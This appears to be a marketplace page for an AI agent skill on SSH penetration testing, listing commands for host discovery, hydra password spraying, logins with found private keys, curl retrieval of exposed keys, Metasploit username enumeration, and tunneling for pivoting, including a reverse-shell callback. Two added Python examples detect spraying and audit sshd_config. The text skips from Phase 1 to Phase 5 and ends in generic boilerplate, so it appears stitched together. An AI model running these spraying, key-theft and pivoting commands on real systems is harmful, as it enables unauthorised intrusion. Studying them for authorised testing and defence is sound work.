Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.
Confirm successful installation by checking the skill directory location:
.cursor/skills/ssh-penetration-testing
Restart Cursor to activate ssh-penetration-testing. Access via /ssh-penetration-testing in your agent's command palette.
Security Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Vulnerability Assessment - Known CVEs, misconfigurations
Tunnel Documentation - Port forwarding configurations
Core Workflow
Phase 1: SSH Service Discovery
Identify SSH services on target networks:
# Quick SSH port scan
nmap -p 22 192.168.1.0/24 --open
# Common alternate SSH ports
nmap -p 22,2222,22222,2200 192.168.1.100
# Full port scan for SSH
nmap -p- --open 192.168.1.100 | grep -i ssh
# Service version detection
nmap -sV -p 22 192.168.1.100
# Test common password across users (quoted so the shell does not expand "!")
hydra -L users.txt -p 'Summer2024!' ssh://192.168.1.100
# Multiple common passwords
for pass in "Password123" "Welcome1" "Summer2024!"; do
    hydra -L users.txt -p "$pass" ssh://192.168.1.100
done
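From the defender's side, the spray above leaves a distinctive trace in sshd's auth log: one source failing against many distinct usernames within seconds. The following Python script is an added example, not part of the skill; it parses constructed auth.log lines and flags that pattern while leaving an ordinary mistyped password alone.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed /var/log/auth.log excerpt (syslog format, no year). One source
# sprays one password across many accounts; another is a user mistyping
# their own password twice, which must not be flagged.
SAMPLE_LOG = """\
Jun 14 10:01:02 host sshd[2101]: Failed password for invalid user alice from 203.0.113.7 port 51012 ssh2
Jun 14 10:01:03 host sshd[2103]: Failed password for bob from 203.0.113.7 port 51014 ssh2
Jun 14 10:01:03 host sshd[2105]: Failed password for invalid user carol from 203.0.113.7 port 51016 ssh2
Jun 14 10:01:04 host sshd[2107]: Failed password for dave from 203.0.113.7 port 51018 ssh2
Jun 14 10:01:05 host sshd[2109]: Failed password for invalid user erin from 203.0.113.7 port 51020 ssh2
Jun 14 10:01:06 host sshd[2111]: Failed password for root from 203.0.113.7 port 51022 ssh2
Jun 14 10:05:40 host sshd[2200]: Failed password for frank from 198.51.100.9 port 40001 ssh2
Jun 14 10:05:48 host sshd[2202]: Failed password for frank from 198.51.100.9 port 40003 ssh2
Jun 14 10:05:55 host sshd[2204]: Accepted publickey for frank from 198.51.100.9 port 40005 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port"
)

def parse_failures(log_text, year=2024):
    """Yield (timestamp, username, source_ip) for each failed-password line."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]

def detect_spray(log_text, min_users=5, window_seconds=60):
    """Return {ip: sorted usernames} for every source that fails against at
    least min_users distinct accounts inside some window_seconds-long window."""
    by_ip = defaultdict(list)
    for ts, user, ip in parse_failures(log_text):
        by_ip[ip].append((ts, user))
    hits = {}
    for ip, events in by_ip.items():
        events.sort()  # chronological, so events[i:] all start at or after events[i]
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if (t - start).total_seconds() <= window_seconds}
            if len(users) >= min_users:
                hits[ip] = sorted(users)
                break
    return hits
```

On the sample, detect_spray(SAMPLE_LOG) flags only 203.0.113.7; min_users and window_seconds are tuning knobs for your environment, not sshd settings.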
Phase 5: Key-Based Authentication Testing
Test for weak or exposed keys:
# Attempt login with found private key
ssh -i id_rsa [email protected]
# Specify key explicitly (bypass agent)
ssh -o IdentitiesOnly=yes -i id_rsa [email protected]
# Force password authentication
ssh -o PreferredAuthentications=password [email protected]
# Try common key names
for key in id_rsa id_dsa id_ecdsa id_ed25519; do ssh -i "$key" [email protected]; done
Check for exposed keys:
# Common locations for private keys
~/.ssh/id_rsa
~/.ssh/id_dsa
~/.ssh/id_ecdsa
~/.ssh/id_ed25519
/etc/ssh/ssh_host_*_key
/root/.ssh/
/home/*/.ssh/
# Web-accessible keys (check with curl/wget)
curl -s http://target.com/.ssh/id_rsa
curl -s http://target.com/id_rsa
curl -s http://target.com/backup/ssh_keys.tar.gz
Phase 6: Vulnerability Exploitation
Search for known vulnerabilities:
# Search for exploits
searchsploit openssh
searchsploit openssh 7.2
# Common SSH vulnerabilities
# CVE-2018-15473 - Username enumeration
# CVE-2016-0777 - Roaming vulnerability
# CVE-2016-0778 - Buffer overflow
# Metasploit enumeration
msfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.100
run
# Username enumeration (CVE-2018-15473)
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/wordlists/users.txt
run
Phase 7: SSH Tunneling and Port Forwarding
Local Port Forwarding
Forward local port to remote service:
# Syntax: ssh -L <local_port>:<remote_host>:<remote_port> user@ssh_server
# Access internal web server through SSH
ssh -L 8080:192.168.1.50:80 [email protected]
# Now access http://localhost:8080
# Access internal database
ssh -L 3306:192.168.1.50:3306 [email protected]
# Multiple forwards
ssh -L 8080:192.168.1.50:80 -L 3306:192.168.1.51:3306 [email protected]
Remote Port Forwarding
Expose local service to remote network:
# Syntax: ssh -R <remote_port>:<local_host>:<local_port> user@ssh_server
# Expose local web server to remote
ssh -R 8080:localhost:80 [email protected]
# Remote can access via localhost:8080
# Reverse shell callback
ssh -R 4444:localhost:4444 [email protected]
Dynamic Port Forwarding (SOCKS Proxy)
Create SOCKS proxy for network pivoting:
# Create SOCKS proxy on local port 1080
ssh -D 1080 [email protected]
# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT -Pn 192.168.1.0/24
# Browser configuration
# Set SOCKS proxy to localhost:1080
ProxyJump (Jump Hosts)
Chain through multiple SSH servers:
# Jump through intermediate host
ssh -J user1@jump_host user2@target_host
# Multiple jumps
ssh -J user1@jump1,user2@jump2 user3@target
# With SSH config
# ~/.ssh/config
Host target
    HostName 192.168.2.50
    User admin
    ProxyJump [email protected]
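Every technique in Phases 4 through 7 depends on sshd settings the host owner controls: password authentication and root login for the spraying, AllowTcpForwarding and GatewayPorts for the -L/-R/-D tunnels. This Python auditor is an added example, not part of the skill; it parses a constructed sshd_config the way sshd does (first value wins, the global section ends at the first Match) and reports directives outside a stated policy. The acceptable-value sets are this example's policy, not OpenSSH requirements.

```python
import re

# Constructed sshd_config fragments: weak settings beside the corrected ones.
WEAK_CONFIG = """\
# sshd ignores case in directive names and keeps the FIRST value it sees
passwordauthentication yes
PermitRootLogin yes
AllowTcpForwarding yes
GatewayPorts yes
"""
HARDENED_CONFIG = """\
PasswordAuthentication no
PermitRootLogin no
MaxAuthTries 3
AllowTcpForwarding no
GatewayPorts no
"""

# directive -> (sshd_config(5) default when absent, this example's acceptable values, why it matters)
POLICY = {
    "passwordauthentication": ("yes", {"no"}, "allows password spraying and brute force"),
    "permitrootlogin": ("prohibit-password", {"no"}, "root is the first account guessed"),
    "maxauthtries": ("6", {"1", "2", "3"}, "more password guesses per connection"),
    "allowtcpforwarding": ("yes", {"no", "local"}, "enables -L/-R/-D pivoting via this host"),
    "gatewayports": ("no", {"no"}, "lets -R listeners bind external interfaces"),
}

def parse_sshd_config(text):
    """Global-section directives as {name_lower: value}; first value wins, Match ends the section."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Key value" or "Key=value"
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break                                      # conditional blocks are out of scope here
        settings.setdefault(key, value)                # later duplicates are ignored, as in sshd
    return settings

def audit(text):
    """Return (directive, effective_value, reason) for each weak setting, using sshd defaults when absent."""
    settings = parse_sshd_config(text)
    findings = []
    for key, (default, ok, why) in POLICY.items():
        value = settings.get(key, default).lower()
        if value not in ok:
            findings.append((key, value, why))
    return findings
```

audit(WEAK_CONFIG) reports all five directives, including MaxAuthTries at its default of 6 even though the file never mentions it; audit(HARDENED_CONFIG) returns an empty list.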
- Claude Desktop or compatible AI client with skill support
- Clear understanding of task or problem to solve
- Willingness to iterate and refine outputs
Time Estimate
15-45 minutes depending on use case complexity
Steps
1. Install skill using provided installation command
2. Test with simple use case relevant to your work
3. Evaluate output quality and relevance
4. Iterate on prompts to improve results
5. Integrate into regular workflow if valuable
Common Pitfalls
- Expecting perfect results without iteration
- Not providing enough context in prompts
- Using skill for tasks outside its intended scope
- Accepting outputs without review and validation
Best Practices
Do
- Start with clear, specific prompts
- Provide relevant context and constraints
- Review and refine all outputs before using
- Iterate to improve output quality
- Document successful prompt patterns
Don't
- Don't use without understanding skill limitations
- Don't skip validation of outputs
- Don't share sensitive information in prompts
- Don't expect skill to replace human judgment
Pro Tips
- Be specific about desired format and style
- Ask for multiple options to choose from
- Request explanations to understand reasoning
- Combine AI efficiency with human expertise
When to Use This
Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
Learning Path
1. Familiarize yourself with skill capabilities and limitations
2. Start with low-risk, non-critical tasks
3. Progress to more complex and valuable use cases
4. Build expertise through regular use and experimentation